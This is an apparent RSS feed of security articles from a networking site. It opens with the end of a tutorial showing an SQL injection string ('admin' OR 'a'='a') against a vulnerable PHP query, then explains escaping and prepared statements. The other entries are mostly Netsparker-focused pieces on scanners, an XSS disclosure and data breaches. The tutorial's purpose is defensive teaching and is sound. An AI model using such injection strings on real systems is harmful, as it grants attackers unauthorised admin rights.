<p style="text-align: justify;">On line #1, we assign the value of the username field from the query string to the variable <em>$user</em>.</p>
<p style="text-align: justify;">On line #2, we insert that variable’s value into the SQL query’s sentence. Substituting the variable with the value <em><strong>admin</strong></em> from the URI, the database query would ultimately be parsed by MySQL as follows:</p>
<p class="box-info" style="text-align: justify;">UPDATE tbl_users SET admin=1 WHERE username='admin'</p>
<p style="text-align: justify;">However, a lack of basic sanitization opens this query string up to serious consequences. All an attacker must do is put a single quote character in the username query string field in order to alter this sentence and inject whatever additional data he or she would like.</p>
<p style="text-align: justify;">Here is an example of what this would look like:</p>
<p class="box-info" style="text-align: justify;"><strong>Request URI: /?username=admin' OR 'a'='a</strong><br />&nbsp;<br />1.&nbsp; $user = $_GET['username'];<br />2.&nbsp; mysql_query("UPDATE tbl_users SET admin=1 WHERE username='$user'");</p>
<p style="text-align: justify;">Now, with this altered data, here is what MySQL would see and attempt to evaluate:</p>
<p class="box-info" style="text-align: justify;">UPDATE tbl_users SET admin=1 WHERE username='admin' OR 'a'='a'</p>
<p style="text-align: justify;">Notice, now, that the condition <em><strong>'a'='a'</strong></em> is always true (basically true=true), so the WHERE clause matches every row and all users will be set to admin status.</p>
<h4 style="text-align: justify;">Ensuring Code is Not Vulnerable to SQL Injection Vulnerabilities</h4>
<p style="text-align: justify;">If we were to add a function, <a href="https://secure.php.net/manual/en/function.mysql-real-escape-string.php" target="_blank" rel="nofollow noopener" title="mysql_real_escape_string()"><em>mysql_real_escape_string()</em></a> for example, on line #1, that would prevent this particular variable from being vulnerable to a <a href="https://www.netsparker.com/web-vulnerability-scanner/vulnerability-security-checks-index/sql-injection/" target="_blank" rel="nofollow noopener" title="SQL injection">SQL injection</a>. In practice, it would look like this:</p>
<p class="box-info" style="text-align: justify;"><strong>Request URI: /?username=admin' OR 'a'='a</strong><br />&nbsp;<br />1.&nbsp; $user = mysql_real_escape_string($_GET['username']);<br />2.&nbsp; mysql_query("UPDATE tbl_users SET admin=1 WHERE username='$user'");</p>
<p style="text-align: justify;">This function escapes characters that are significant in MySQL’s query syntax by prefixing them with backslashes. Rather than treating the single quote as the end of the string value, MySQL understands the prefixing backslash to mean that the quote is an ordinary character inside the value, and it keeps reading the string. The string, to MySQL, would therefore look like this:</p>
<p class="box-info" style="text-align: justify;">UPDATE tbl_users SET admin=1 WHERE username='admin\' OR \'a\'=\'a'</p>
<p style="text-align: justify;">Because each single quote is escaped, MySQL treats it as part of the username value rather than as a component of the SQL syntax. The SQL injection is thus avoided, and the intended meaning of the SQL sentence remains undisrupted.</p>
<p style="text-align: justify;">Caveat: For these examples, we used older, deprecated functions like<strong> <em>mysql_query()</em> </strong>and <strong><em>mysql_real_escape_string()</em></strong> for two reasons:</p>
<p style="text-align: justify; margin-left: 30px;">1.&nbsp;&nbsp;&nbsp; Most PHP code still actively running on websites uses these deprecated functions;<br />2.&nbsp;&nbsp;&nbsp; It allows us to provide simple examples easier for users to understand.</p>
<p style="text-align: justify;">However, the right way to do it is to use prepared SQL statements. For example, the <em>prepare()</em> functions of the <a href="https://php.net/manual/en/book.mysqli.php" target="_blank" rel="nofollow noopener" title="MySQLi">MySQLi</a> and <a href="https://php.net/manual/en/ref.pdo-mysql.php" target="_blank" rel="nofollow noopener" title="PDO_MySQL">PDO_MySQL</a> PHP extensions allow you to assemble a SQL statement using placeholder symbols, very much as a <strong><em>sprintf()</em></strong> function does. This removes any possibility of user input injecting additional SQL syntax into a database query, because the values bound to a prepared statement are passed to the database separately from the SQL text and are never parsed as SQL syntax. Of course, this all assumes you are using PHP, but the idea applies equally to any other web language.</p>
<h2 style="text-align: justify;">SQL Injection Is The Most Widely Exploited Vulnerability</h2>
<p style="text-align: justify;">Even though it has been more than sixteen years since the first documented attack of SQL Injection, it is still a very popular vulnerability with attackers and is widely exploited. In fact SQL Injection has always topped the OWASP Top 10 list of most exploited vulnerabilities.</p>]]></description>
			<category>Security Articles</category>
			<pubDate>Sat, 08 Aug 2015 18:32:00 +1000</pubDate>
		</item>
		<item>
			<title>Web Application Security Interview on Security Weekly – Importance of Automated Web Application Security</title>
			<link>https://www.firewall.cx/tools-tips-reviews/security-articles/netsparker-ceo-interview-importance-of-automated-web-application-scanner.html</link>
			<guid isPermaLink="true">https://www.firewall.cx/tools-tips-reviews/security-articles/netsparker-ceo-interview-importance-of-automated-web-application-scanner.html</guid>
			<description><![CDATA[<p style="text-align: justify;"><img src="https://www.firewall.cx/images/stories/netsparker-importance-of-automated-web-application-scanner.png" alt="netsparker-importance-of-automated-web-application-scanner" style="margin: 7px; float: left;" title="netsparker-importance-of-automated-web-application-scanner" />A few weeks back Security Weekly interviewed Ferruh Mavituna, Netsparker’s CEO and Product Architect. Security Weekly is a popular podcast that provides free content on IT security news, vulnerabilities, hacking and research, and frequently interviews industry leaders such as John McAfee, Jack Daniel and Bruce Schneier.</p>
<p style="text-align: justify;">During the 30-minute interview, Security Weekly’s host Paul Asadoorian and Ferruh Mavituna highlight how important it is to use an automated web application security scanner to find vulnerabilities in websites and web applications. They also briefly discuss web application firewalls and their effectiveness, and how Netsparker is helping organizations improve their post-scan process of fixing vulnerabilities with their online web application security scanner, Netsparker Cloud.</p>
<p style="text-align: justify;">Paul and Ferruh covered several other aspects of web application security during this interview, so whether you are a seasoned security professional, a developer or a newbie, it is a recommended watch.</p>
<p style="text-align: justify;">To view the interview, click on the image below:</p>
<p style="text-align: center;"><a href="https://www.youtube.com/watch?v=8xXR4-K-PyE" target="_blank" rel="nofollow noopener" title="Netsparker CEO explains the importance of automated web application security scanners"><img src="https://www.firewall.cx/images/stories/netsparker-ceo-interview-importance-of-automated-web-application-scanner.png" alt="netsparker-ceo-interview-importance-of-automated-web-application-scanner" style="margin: 7px; vertical-align: bottom;" title="Netsparker CEO explains the importance of automated web application security scanners" /></a><br />Figure 1. Netsparker CEO explains the importance of automated web application security scanners</p>]]></description>
			<category>Security Articles</category>
			<pubDate>Wed, 01 Jul 2015 18:59:33 +1000</pubDate>
		</item>
		<item>
			<title>WordPress DOM XSS Cross-site Scripting Vulnerability Identified By Netsparker</title>
			<link>https://www.firewall.cx/tools-tips-reviews/security-articles/netsparker-discovery-wordpress-dom-xss-scripting-vulnerability.html</link>
			<guid isPermaLink="true">https://www.firewall.cx/tools-tips-reviews/security-articles/netsparker-discovery-wordpress-dom-xss-scripting-vulnerability.html</guid>
			<description><![CDATA[<p style="text-align: justify;"><strong><img src="https://www.firewall.cx/images/stories/netsparker-discovery-wordpress-dom-xss-scripting-vulnerability-1.png" alt="netsparker-discovery-wordpress-dom-xss-scripting-vulnerability-1" style="margin: 7px; float: left;" title="Netsparker WordPress DOM XSS Cross-site Scripting Vulnerability" />8th of May 2015</strong>, <strong>Netsparker</strong> announced yesterday the discovery of a <strong>critical security vulnerability</strong> in an <strong>HTML file</strong> found in many <strong>WordPress themes</strong>, including those used by <strong>WordPress.org hosted websites</strong>. As reported by Netsparker, the <strong>specific HTML file is vulnerable to cross-site scripting attacks and session hijacking.</strong> WordPress.org has already issued an official announcement and patch (v4.2.2) and recommends WordPress administrators <strong>update their website files</strong> and <strong>themes</strong>.</p>
<p style="text-align: justify;">The <strong>Genericons icon font package</strong>, which is used in a number of popular themes and plugins, <strong>contained an HTML file vulnerable to a cross-site scripting attack</strong>. All affected themes and plugins hosted on WordPress.org (including the Twenty Fifteen default theme) were updated yesterday by the WordPress security team to address this issue by removing this nonessential file. To help protect other Genericons usage, <strong>WordPress 4.2.2</strong> proactively scans the wp-content directory for this HTML file and removes it. Reported by Robert Abela of Netsparker.</p>
<p style="text-align: justify;">By exploiting a <a href="https://www.firewall.cx/security/web-application-vulnerability-scanners/understanding-xss-cross-site-scripting-attacks-and-types-of-xss-exploits.html" target="_blank" title="Cross-site scripting vulnerability">Cross-site scripting vulnerability</a> the attacker can <strong>hijack a logged in user’s session</strong>. This means that the malicious hacker can <strong>change</strong> the logged in <strong>user’s password</strong> and invalidate the session of the victim while the <strong>hacker maintains access</strong>. As seen from the XSS example in Netsparker's article, if a web application is vulnerable to cross-site scripting and the <strong>administrator’s session is hijacked</strong>, the malicious <strong>hacker</strong> exploiting the vulnerability <strong>will have full admin privileges on that web application</strong>.</p>
<h4 style="text-align: justify;">Related Security Articles</h4>
<ul>
<li class="checkbox" style="text-align: justify;">
<div><a href="https://www.firewall.cx/tools-tips-reviews/security-articles/implications-of-unsecure-webservers-and-websites-for-oganizations-companies.html" target="_blank" title="The Implications of Unsecure Webservers &amp; Websites for Organizations &amp; Businesses">The Implications of Unsecure Webservers &amp; Websites for Organizations &amp; Businesses</a></div>
</li>
<li class="checkbox" style="text-align: justify;">
<div><a href="https://www.firewall.cx/tools-tips-reviews/security-articles/automation-web-application-security-testing.html" target="_blank" title="The Importance of Automating Web Application Security Testing &amp; Penetration Testing">The Importance of Automating Web Application Security Testing &amp; Penetration Testing</a></div>
</li>
<li class="checkbox" style="text-align: justify;">
<div><a href="https://www.firewall.cx/tools-tips-reviews/security-articles/choosing-web-application-security-scanner.html" target="_blank" title="Choosing a Web Application Security Scanner - The Importance of Using the Right Security Tools">Choosing a Web Application Security Scanner - The Importance of Using the Right Security Tools</a></div>
</li>
</ul>]]></description>
			<category>Security Articles</category>
			<pubDate>Sat, 09 May 2015 04:52:46 +1000</pubDate>
		</item>
		<item>
			<title>Choosing a Web Application Security Scanner - The Importance of Using the Right Security Tools</title>
			<link>https://www.firewall.cx/tools-tips-reviews/security-articles/choosing-web-application-security-scanner.html</link>
			<guid isPermaLink="true">https://www.firewall.cx/tools-tips-reviews/security-articles/choosing-web-application-security-scanner.html</guid>
			<description><![CDATA[<p style="text-align: justify;"><img src="https://www.firewall.cx/images/stories/choosing-web-application-security-scanner-1.jpg" alt="choosing-web-application-security-scanner-1" style="margin: 7px; float: left;" title="Selecting the right Web Security Scanner" />In the world of information security there exist many tools, from small open source products to full appliances to secure a system, a network, or an entire corporate infrastructure.&nbsp; Of course, everyone is familiar with the concept of a firewall – even movies like Swordfish and TV shows like NCIS have so very perfectly described, in riveting detail, what a firewall is.&nbsp; But there are other, perhaps less sexy utilities in a security paradigm.</p>
<p style="text-align: justify;">Various concepts and security practices – such as using complex passphrases, or eschewing passphrases entirely, deeply vetting email sources, safe surfing habits, etc. – are increasingly growing trends among the general workforce at large, especially with the ubiquity of computers at every desk.&nbsp; But security in general is still unfortunately looked at as an afterthought, even when a lack thereof begets massive financial loss at a seemingly almost daily level.</p>
<p style="text-align: justify;">Security engineers are all too often considered an unnecessary asset, simply a menial role anybody can do: a role that can be assumed as yet another hat worn by developers, system administrators, or, well, perhaps just someone who only shows a modest capability with Excel formulas. Whatever the reason for such a decision, be it financial or otherwise, the consequences can be severe and long-lasting. Sony underestimated the value of a strong and well-equipped security team multiple times, choosing to forgo a powerful army in favour of a smaller, less outfitted and thus more thinly stretched but cheaper alternative. This, in turn, yielded some of the largest security breaches ever seen, let alone by a single corporation. Had their security department been better outfitted with the right tools, it is quite possible those events would have played out entirely differently.</p>
<h2 style="text-align: justify;">Using The Right Security Tools</h2>
<p style="text-align: justify;">So, what constitutes “the right tools”?&nbsp; Many things.&nbsp; A well-populated team of capable security engineers certainly can be considered a valuable tool in building a strong security posture within an infrastructure.&nbsp; But, more specifically and very critically, it is what assets those engineers have at their disposal that may mean the difference between a minor event that never even makes it outside the corporate headquarters doors, and a major event that results in a corporation paying for identity theft protection for millions of customers.&nbsp; Those tools of course vary widely depending on the organization, but one common element they all do – or at least absolutely should – share is a <a href="https://www.firewall.cx/security/web-application-vulnerability-scanners.html" target="_blank" title="web application security scanner">web application security scanner</a>.</p>
<h2 style="text-align: justify;">What Is A Web Application Security Scanner?</h2>
<p style="text-align: justify;">A website that accepts user input in any form, be it URL values or submitted content, is a complex beast.&nbsp; Not only does the content an end user provides change the dynamics of the website, but it even has the potential to cripple that website if done maliciously and left unprotected against.&nbsp; For every possibility of user content, the amount of potential attack vectors increases on a magnitude of near infinity.&nbsp; It is literally impossible for a security engineer, or even team thereof, to account for all these possibilities by hand and, especially, test them for known or unknown vulnerabilities.</p>
<p style="text-align: justify;">Web scanners exist for this very purpose, designed carefully to predict potential and common methods of attack, then brute-force test them to find any possibility of an existing vulnerability.&nbsp; And they do this at a speed impossible for humans to replicate manually.&nbsp; This is crucial for many reasons, namely that it saves time, it is thorough and comprehensive, and, if designed well, adaptive and predictive to attempt clever methods that even the most skilled security engineer may not immediately think of.&nbsp; Truly, not using a web security scanner is only inviting potentially irreparable harm to a web application and even the company behind it.&nbsp; But the question remains: Which web scanner works the best?</p>
<h2 style="text-align: justify;">Options Galore - How To Choose Which Web Scanner Is Right For You</h2>
<p style="text-align: justify;"><img src="https://www.firewall.cx/images/stories/choosing-web-application-security-scanner-2.jpg" alt="choosing-web-application-security-scanner-2" style="margin: 7px; float: left;" title="Choosing the right Web Security Scanner" />Many websites and web applications are like human fingerprints, with no two being alike. Of course, many websites may use a common backend engine (WordPress, an MVC framework like Laravel or Ruby on Rails, etc.), but the layers on top of those engines, such as plugins or custom-coded additions, are often a quite unique collection.</p>
<p style="text-align: justify;">The backend engine is also not the only portion to be concerned with.&nbsp; Frontend vulnerabilities may exist with each of these layers, such as cross-site scripting, insecurely implemented jQuery libraries, and add-ons, poor sanitization against AJAX communication models, and many more.&nbsp; Each layer presents another nearly endless array of input possibilities to test for vulnerabilities.</p>
<p style="text-align: justify;">A web scanner needs to be capable of digging through these unique complexities and providing accurate, reliable findings. False positives can waste an engineer’s time or, worse, send a development team on a useless chase, writing unit tests and hunting for a falsely detected vulnerability. And if the scanner is difficult to understand or provides little insight into the detected vulnerabilities, it makes for a challenging or undesirable utility that may go unused. Indeed, a well-designed web security scanner that delivers on all fronts is an important necessity for a strong security posture and a better secured infrastructure.</p>
<h2 style="text-align: justify;">Final Thoughts</h2>
<p style="text-align: justify;">There is no one perfect solution that will solve all problems and completely secure your website such that it becomes impenetrable.&nbsp; Further, a web security scanner will only be as effective as the security engineers or developers fixing all flaws it finds.&nbsp; A web security scanner is only the first of many, many steps, but it indeed is an absolutely critical one for a powerful security posture.</p>
<p style="text-align: justify;">Indeed, we keep returning to that phrase – <em>security posture</em> – because it is a perfectly analogous way to look at web application, system, and infrastructure security for both what it provides and what is required for good posture: a strong backbone.&nbsp; Focused visibility and a clear view of paths over obstructions is not possible with a slouched posture.&nbsp; Nothing will provide that vision as clearly as a web security scanner will, and no backbone is complete without a competent and useful web security scanning solution at its top.</p>]]></description>
			<category>Security Articles</category>
			<pubDate>Tue, 14 Apr 2015 09:17:45 +1000</pubDate>
		</item>
		<item>
			<title>Comparing Netsparker Cloud-based and Desktop-based Security Software solutions – Which solution is best for you?</title>
			<link>https://www.firewall.cx/tools-tips-reviews/security-articles/cloud-based-vs-desktop-based-security-solutions.html</link>
			<guid isPermaLink="true">https://www.firewall.cx/tools-tips-reviews/security-articles/cloud-based-vs-desktop-based-security-solutions.html</guid>
			<description><![CDATA[<p style="text-align: justify;">If you are reading this you have heard about Cloud Computing. If not, I would be worried! Terms such as Cloud Computing, Software as a Service and Cloud Storage have become a permanent fixture in adverts, marketing content and technical documentation.</p>
<p style="text-align: justify;">Many Windows desktop software applications have moved to the “cloud”. Yet even though the whole industry wants you and your data in the cloud, have you ever looked into the pros and cons of the cloud? Does it make sense to go in that direction?</p>
<p style="text-align: justify;">Let’s use web application security scanners as an example: software that is used to automatically identify vulnerabilities and security flaws in websites and web applications. Most, if not all, of the industry-leading vendors have both a desktop edition and an online service offering. In fact, Netsparker just launched their all-new service offering, Netsparker Cloud, the online false-positive-free web application security scanner. In such a case, which one should you go for?</p>
<p style="text-align: justify;">As clearly explained in Netsparker Desktop VS Netsparker Cloud, both web security solutions are built around the same scanning engine, hence their vulnerability detection capabilities are the same. The main differences between the two are the other, non-scan-related features, which also define the scope of each solution.</p>
<p style="text-align: center;"><a href="https://www.firewall.cx/images/stories/cloud-based-vs-desktop-based-security-solutions-1b.png" target="_blank" title="Netsparker Cloud-based Website security scanner"><img src="https://www.firewall.cx/images/stories/cloud-based-vs-desktop-based-security-solutions-1.png" alt="cloud-based-vs-desktop-based-security-solutions-1" style="display: block; margin-left: auto; margin-right: auto;" title="Netsparker Web-Based Security Application" /></a>Figure 1. Netsparker Cloud-based Security Scanner (Click to enlarge)</p>
<p style="text-align: justify;">For example, Netsparker Desktop is ideal for small teams, or security professionals who work on their own and have a small to medium workload. On the other hand, Netsparker Cloud is specifically designed for organizations which run and manage a good number of websites and may even have their own team of developers and security professionals. It is a multi-user platform, has a vulnerability tracking solution (a system that is similar to a normal bug tracking solution but specifically designed for web application vulnerabilities) and is fully scalable, to accommodate the simultaneous scanning of hundreds or thousands of web applications.</p>
<p style="text-align: center;"><a href="https://www.firewall.cx/images/stories/cloud-based-vs-desktop-based-security-solutions-2b.png" target="_blank" title="Netsparker Desktop-based Website security scanner"><img src="https://www.firewall.cx/images/stories/cloud-based-vs-desktop-based-security-solutions-2.png" alt="cloud-based-vs-desktop-based-security-solutions-2" style="display: block; margin-left: auto; margin-right: auto;" title="Netsparker Desktop-Based Security Application" /></a>Figure 2. Netsparker Desktop-based Security Scanner (Click to enlarge)</p>
<p style="text-align: justify;">Do not just follow the trend; inform yourself. Yes, your reading might be flooded with cloud-related terms, and the industry is pushing you to move your operations to the <strong>cloud</strong> as it is cheaper and <strong>more reliable</strong>, but as clearly explained in the <strong>desktop vs cloud web scanner comparison</strong>, both solutions still have a place in today’s industry.</p>]]></description>
			<category>Security Articles</category>
			<pubDate>Wed, 25 Mar 2015 21:46:20 +1100</pubDate>
		</item>
		<item>
			<title>The Importance of Automating Web Application Security Testing &amp; Penetration Testing </title>
			<link>https://www.firewall.cx/tools-tips-reviews/security-articles/automation-web-application-security-testing.html</link>
			<guid isPermaLink="true">https://www.firewall.cx/tools-tips-reviews/security-articles/automation-web-application-security-testing.html</guid>
			<description><![CDATA[<p style="text-align: justify;"><img src="https://www.firewall.cx/images/stories/automation-web-application-security-testing-1.jpg" alt="automation-web-application-security-testing-1" style="margin: 7px; float: left;" title="Automating Web Application Security Scanning" />Have you ever tried to make a list of all the attack surfaces you need to secure on your networks and web farms? Try to do it and one thing will stand out: keeping websites and web applications secure. We have <strong>firewalls</strong>, <strong>IDS</strong> and <strong>IPS systems</strong> that inspect every packet that reaches our servers and are able to drop it should it be flagged as <strong>malicious</strong>, but what about <strong>web applications</strong>?</p>
<p style="text-align: justify;"><strong>Web application security</strong> is different from <strong>network security</strong>. When configuring a firewall you control who accesses what, but when it comes to web application security you have to allow everybody in, including the bad guys, and expect that everyone plays by the rules. Hence <strong>web applications should be secure</strong>; web application security should be given <strong>much more attention</strong> and, considering the complexity of today’s web applications, it should be <strong>automated</strong>.</p>
<p style="text-align: justify;">Let’s dig deep into this subject and see why it needs to be automated.</p>
<h2 style="text-align: justify;">Automated Web Security Testing Saves Time</h2>
<p style="text-align: justify;">Also known as <strong>Penetration Testing</strong> or “<strong>pen testing</strong>”, this is the process by which a security engineer or “pen tester” applies a series of <strong>injection</strong> or <strong>vulnerability tests</strong> against areas of a website that accept user input to find potential exploits and alert the website owner before they get taken advantage of and become massive headaches or even financial losses. Common places for this can include user data submission areas such as authentication forms, comments sections, user viewing configuration options (like layout selections), and anywhere else that accepts input from the user. This can also include the URL itself, which may have a Search Engine Optimization-friendly URI formatting system.</p>
<p style="text-align: justify;">Most MVC frameworks or web application suites like WordPress offer this type of URI routing. (We differentiate between a URL and a URI. A URL is the entire address, including the <strong>http://</strong> portion, the entire domain, and everything thereafter; whereas the URI is the portion usually starting after the domain (but sometimes including it, for context), such as /user/view/123 or test.com/articles/123.)</p>
<p style="text-align: justify;">For example, your framework may take a URI style as test.com/system/function/data1/data2/, where system is the controlling system you wish to invoke (such as an articles system), function is the action you wish to invoke (such as read or edit), and the rest are data values, typically in assumed positions (such as year/month/article-title).</p>
<p style="text-align: justify;">Each of these individual values requires a specific data type, such as a string, an integer, a certain regular expression match, or infinite other possibilities. If data types are not strictly enforced, or – sadly, as often as this really does happen – user-submitted data is not properly sanitized, then a hacker can potentially gain information to get further access, if not even force direct backdoor access via a <a href="https://www.firewall.cx/security/web-application-vulnerability-scanners/how-sql-injection-attacks-work-examples.html" target="_blank" title="SQL injection">SQL injection</a> or a remote file inclusion. Such vulnerabilities are such a prevalent and consistent threat that, for example, <a href="https://www.firewall.cx/security/web-application-vulnerability-scanners/how-sql-injection-attacks-work-examples.html" target="_blank" title="SQL Injection has made it to the OWASP Top 10 list for over 14 years">SQL Injection has made it to the OWASP Top 10 list for over 14 years</a>.</p>
<p style="text-align: justify;">There exist potentially millions, billions, or more combinations of various URIs in your web application, including ones it may not support by default or even to your knowledge. There could be random <a href="http://php.net/manual/en/function.phpinfo.php">phpinfo();</a> scripts publicly accessible that mistakenly got left in by a developer, an unchecked user input somewhere, some file upload system that does not properly prevent script execution – any random number of possibilities. No security engineer or team can reasonably anticipate or test all of these possibilities. And black-hat hackers know all this too, sometimes better than those tasked to protect against these threats.</p>
<h2 style="text-align: justify;">Automation Isn’t Just Used By The Good Guys</h2>
<p style="text-align: justify;"><img src="https://www.firewall.cx/images/stories/automation-web-application-security-testing-2.jpg" alt="automation-web-application-security-testing-2" style="margin: 7px; float: left;" title="Inspecting Web Applications for Vulnerabilities" />Many automated security tools exist not to test and find security holes, but to exploit them when found. Black-hat hackers intent on disrupting your web application possess automated suites as well, because they, too, know a manual approach is a waste of time (that is, until they find a useful exploit, and by then it’s sometimes too late).</p>
<p style="text-align: justify;">Some utilities, like <a href="http://ha.ckers.org/slowloris/"><strong>Slowloris</strong></a>, exist to exploit known weaknesses in common web services, like the Apache web server itself. Others prey on finding opportunity in the form of insecure common web applications – older versions of WordPress, phpBB, phpMyAdmin, cPanel, or other frequently exploited web applications. There exist <a href="https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/">dozens of categories of vulnerabilities</a>, each with thousands or millions of attack variants. Looking for these is a daunting task.</p>
<p style="text-align: justify;">As quickly as you can spin up a web application, a hacker can automatically scan it and possibly find vulnerabilities. Leveraging an automated web application vulnerability scanner like Netsparker or Netsparker Cloud provides you the agility and proactivity to find and prevent threats before they become seriously damaging problems. This holds especially true for complex web applications such as large forum systems, blogging platforms and custom web applications. The more possibility for user submitted data and functionality, the more opportunity for vulnerabilities to exist and be exploited. And remember, this changes again for every new version of the web application you install. A daunting task, indeed.</p>
<p style="text-align: justify;">Without automation of web application security testing, a true strong security posture is impossible to achieve. Of course, many other layers ultimately exist – least-privilege practice, segregated (jail, chroot, virtual machine) systems, firewalls, etc. – but if the front door is not secure, what does it matter if the walls are impenetrable? With the speed afforded by automation, a strong and capable web vulnerability scanner, and of course patching found flaws and risks, security testing guarantees as best as reasonably possible that the front door to your web application and underlying infrastructure remains reinforced and secure.</p>]]></description>
			<category>Security Articles</category>
			<pubDate>Thu, 26 Feb 2015 08:23:16 +1100</pubDate>
		</item>
		<item>
			<title>Statistics Highlight the State of Security of Web Applications - Many Still Vulnerable to Hacker Attacks</title>
			<link>https://www.firewall.cx/tools-tips-reviews/security-articles/state-of-security-of-web-applications.html</link>
			<guid isPermaLink="true">https://www.firewall.cx/tools-tips-reviews/security-articles/state-of-security-of-web-applications.html</guid>
			<description><![CDATA[<p style="text-align: justify;"><strong><img src="https://www.firewall.cx/images/stories/state-of-security-of-web-applications-1.png" alt="state-of-security-of-web-applications-1" style="display: block; margin: 7px; float: left;" title="Web Security Hacking - Passwords" />Netsparker</strong> use <strong>open source web applications</strong> such as TWiki for a totally different purpose than what they were intended for. They use them to test their own web application security scanners.</p>
<p style="text-align: justify;">Netsparker need to ensure that their scanners are able to <strong>crawl</strong> and <strong>identify attack surfaces</strong> on all sorts of <strong>web applications</strong>, and identify as many vulnerabilities as possible. Hence they frequently scan open source web applications, using them as a test bed for their crawling and scanning engine.</p>
<p style="text-align: justify;">Thanks to this exercise, <strong>Netsparker</strong> are also helping developers ship more secure code, since they report their findings to the developers and sometimes also help them remediate the issue. When such web application vulnerabilities are identified, Netsparker release an advisory; between <strong>2011</strong> and <strong>2014</strong> Netsparker published <strong>87 advisories</strong>.</p>
<p style="text-align: justify;"><img src="https://www.firewall.cx/images/stories/state-of-security-of-web-applications-2.png" alt="state-of-security-of-web-applications-2" style="display: block; margin-left: auto; margin-right: auto;" title="state of security of web applications" /></p>
<p style="text-align: justify;">A few days ago Netsparker released some statistics about the 87 advisories they published so far. As a quick overview, from these statistics we can see that <a href="https://www.firewall.cx/security/web-application-vulnerability-scanners/protecting-user-cookies-from-xss-vulnerabilities-attacks.html" target="_blank" title="Netsparker cross-site scripting">cross-site scripting</a> is the most common vulnerability in the open source web applications that were scanned. Is it a coincidence? Not really.</p>
<p style="text-align: justify;">The article also explains why many web applications are most probably vulnerable to this type of flaw, which has remained on the OWASP Top 10 list ever since.</p>
<p style="text-align: justify;">The conclusion we can draw from such statistics is quite predictable, but at the same time shocking. There is still a very long way to go in web application security, i.e. web applications are still poorly coded, making them an easy target for malicious hacker attacks.</p>]]></description>
			<category>Security Articles</category>
			<pubDate>Wed, 04 Feb 2015 07:30:00 +1100</pubDate>
		</item>
		<item>
			<title>The Implications of Unsecure Webservers &amp; Websites for Organizations &amp; Businesses</title>
			<link>https://www.firewall.cx/tools-tips-reviews/security-articles/implications-of-unsecure-webservers-and-websites-for-oganizations-companies.html</link>
			<guid isPermaLink="true">https://www.firewall.cx/tools-tips-reviews/security-articles/implications-of-unsecure-webservers-and-websites-for-oganizations-companies.html</guid>
			<description><![CDATA[<p style="text-align: justify;"><img src="https://www.firewall.cx/images/stories/implications-of-unsecure-webservers-websites-1.png" alt="implications-of-unsecure-webservers-websites-1" width="135" height="135" style="margin: 7px; float: left;" title="The Implications of unsecure webservers &amp; websites" />Long gone are the days where a simple port scan on a <strong>company’s webserver</strong> or <strong>website</strong> was considered enough to <strong>identify security issues and exploits</strong> that needed to be <strong>patched</strong>. With all the recent <strong>attacks on websites</strong> and <strong>webservers</strong> which caused millions of dollars in damage, we thought it would be a great idea to analyze the <strong>implications vulnerable webservers</strong> and <strong>websites</strong> have for companies, while providing useful information to help <strong>IT Departments</strong>, <strong>security engineers</strong> and <strong>application developers</strong> proactively avoid unwanted situations.</p>
<p style="text-align: justify;">Unfortunately, companies and webmasters turn their attention to their webservers and websites after the damage is done, in which case the cost is always greater than that of any proactive measures that could have been taken to avoid the situation.</p>
<h2 style="text-align: justify;">Most Security Breaches Could Have Been Easily Prevented</h2>
<p style="text-align: justify;">Without doubt, corporate websites and webservers are amongst the most preferred targets for hackers. <strong>Exploiting well-known vulnerabilities</strong> provides them with easy access to databases that contain sensitive information such as <strong>usernames</strong>, <strong>passwords</strong>, <strong>email addresses</strong>, <strong>credit &amp; debit card numbers</strong>, <strong>social security numbers</strong> and much more.</p>
<p style="text-align: justify;">The sad part of this story is that in most cases, hackers made use of <strong>old exploits and vulnerabilities</strong> to scan their targets and eventually <strong>gain unauthorized access</strong> to their systems.</p>
<p style="text-align: justify;">Most security experts agree that if companies <strong>proactively scanned</strong> and <strong>tested</strong> their systems using well-known <strong>web application security scanner tools</strong>, e.g. <strong>Netsparker</strong>, such security breaches could have been easily avoided. The <strong>Online Trust Alliance</strong> (<strong>OTA</strong>) also confirms this: it analyzed thousands of security breaches that occurred in the <strong>first half of 2014</strong> and <strong>concluded that these could have been easily prevented</strong>. <a href="https://www.otalliance.org/news-events/press-releases/ota-determines-over-90-data-breaches-2014-could-have-been-prevented" rel="nofollow">[Source: OTA Website]</a></p>
<p class="box-info" style="text-align: justify;">Tools such as Web Application Vulnerability Scanners are used by security professionals to automatically scan websites and web applications for hidden vulnerabilities.</p>
<p style="text-align: justify;">When reading through recent security breaches, we can slowly begin to understand the implications and disastrous effects these had for companies and customers. Quite often, the number of affected users whose information was compromised was in the millions. We should also keep in mind that in many cases, the <strong>true magnitude</strong> of any such security incident is very rarely made known to the public.</p>
<p style="text-align: justify;">Below are a few of the <strong>biggest security data breaches</strong> which exposed an unbelievable amount of information to hackers:</p>
<h4 style="text-align: justify;">eBay.com – 145 Million Compromised Accounts</h4>
<p style="text-align: justify;"><img src="https://www.firewall.cx/images/stories/implications-of-unsecure-webservers-websites-2.png" alt="implications-of-unsecure-webservers-websites-2" width="100" height="41" style="margin: 7px; float: left;" title="The Implications of unsecure webservers &amp; websites ebay" />In late February – early March 2014, the eBay database that held customer names, encrypted passwords, email addresses, physical addresses, phone numbers, dates of birth and other personal information, was compromised, exposing sensitive information to hackers. [Source: bgr.com website]</p>
<h4 style="text-align: justify;">JPMorgan Chase Bank – 76 Million Household Accounts &amp; 7 Million Small Business</h4>
<p style="text-align: justify;"><img src="https://www.firewall.cx/images/stories/implications-of-unsecure-webservers-websites-3.png" alt="implications-of-unsecure-webservers-websites-3" style="margin: 7px; float: left;" title="The Implications of unsecure webservers &amp; websites JP Morgan" />In June 2014, JPMorgan Chase bank was hit badly and had sensitive personal and financial data exposed for over 80 million accounts. The hackers appeared to obtain a list of the applications and programs that run on the company’s computers and then crosschecked them with <strong>known vulnerabilities</strong> for each <strong>program</strong> and <strong>web application</strong> in order to find an entry point back into the bank’s systems.<br />[Source: nytimes.com website]</p>
<p class="box-info" style="text-align: justify;">Find security holes on your websites and fix them before they do by scanning your websites and web applications with a Web Application Security Scanner.</p>
<h4>Forbes.com – 1 Million User Accounts</h4>
<p><img src="https://www.firewall.cx/images/stories/implications-of-unsecure-webservers-websites-4.png" alt="implications-of-unsecure-webservers-websites-4" style="margin: 7px; float: left;" title="The Implications of unsecure webservers &amp; websites Forbes.com" />In February 2014, the Forbes.com website succumbed to an attack that <strong>leaked over 1 million user accounts</strong> that contained email addresses, passwords and more.&nbsp; The Forbes.com WordPress-based backend site was defaced with a number of news posts. [Source: cnet.com website]</p>
